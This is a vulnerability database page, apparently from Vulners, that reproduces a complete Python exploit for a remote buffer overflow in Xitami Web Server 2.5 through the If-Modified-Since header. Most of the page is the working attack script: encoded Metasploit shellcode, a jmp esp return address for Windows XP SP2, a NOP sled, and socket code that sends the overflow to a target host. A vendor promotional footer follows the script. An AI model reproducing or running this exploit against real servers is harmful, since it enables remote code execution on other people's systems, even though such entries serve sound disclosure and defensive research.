Vulners
Lucene search
Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
===================================================================
Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
===================================================================
#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <[email protected]>
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]\r\n
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]\r\n
# EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun ;)
##
from struct import pack
from time import sleep
from socket import *
host = "192.168.0.1"
port = 80
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish)
jmpcode = "\xeb\x22" # jmp short +0x22
buf = "A" * 72 # (76 - 4) xigui32.exe
buf += opcode
buf += jmpcode
buf += "\x90" * 128
buf += shellcode
header = (
'GET / HTTP/1.1\r\n'
'Host: %s\r\n'
'If-Modified-Since: Evil, %s\r\n'
'\r\n') % (host, buf)
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(header)
sleep(1)
s.close()
print "DONE"
# EoF
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Sep 2007 00:00Current
7.1High risk
Vulners AI Score7.1